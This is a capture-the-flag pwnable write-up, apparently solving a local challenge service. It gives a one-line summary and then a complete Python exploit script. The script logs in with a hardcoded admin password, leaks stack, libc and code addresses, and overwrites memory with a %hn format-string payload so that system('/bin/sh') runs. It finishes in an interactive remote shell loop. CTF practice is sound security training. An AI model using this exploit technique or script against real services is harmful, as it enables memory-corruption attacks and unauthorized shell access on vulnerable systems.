Category : Pwnables
Summary : make chdir() fail, obtain the admin password, then exploit a 13-byte format string bug (FSB)
Exploit
#!/usr/bin/python from socket import * from struct import pack,unpack p = lambda x:pack("<L",x) s = socket(AF_INET,SOCK_STREAM) s.connect(("localhost",8887)) raw_input() print s.recv(1024) s.send("1\n") print s.recv(1024) s.send("admin\n") print s.recv(1024) s.send("y0uC4nn0tgu355th1sp4ssw0rd!#@#!@!$!#@\n") print s.recv(1024) s.send("2\n") print s.recv(1024) s.send("XXXX\n") print s.recv(1024) d = s.recv(1024) stack = unpack("<L",d[4:8])[0]+0xa4 lib = unpack("<L",d[8:12])[0] - 0x39ac4e + 0xe000 code = unpack("<L",d[32:36])[0] - 0x1197 print hex(code) system_addr = lib+0x41260 system_arg = stack - 0x38e read_plt = code + 0xbd0 pppr = code + 0xf47 print hex(stack) print hex(lib) raw_input(">value") num = ((stack&0x0000ffff) - 4)-926 payload = "" payload += p(system_addr) payload += "aaaa" payload += p(system_arg) s.send("4\n") s.recv(1024) s.send("1\n") s.recv(1024) s.send("admin\x00"+payload+"\x00\x00\x00\x00/bin/sh\n") s.recv(1024) s.send("y0uC4nn0tgu355th1sp4ssw0rd!#@#!@!$!#@\n") s.recv(1024) s.send("5\n") s.recv(1024) s.send("%"+str(num)+"c%12$hn") raw_input(">") s.recv(1024) while 1: comm = raw_input("$") if comm == "exit": break s.send(comm+"\n") print s.recv(1024) |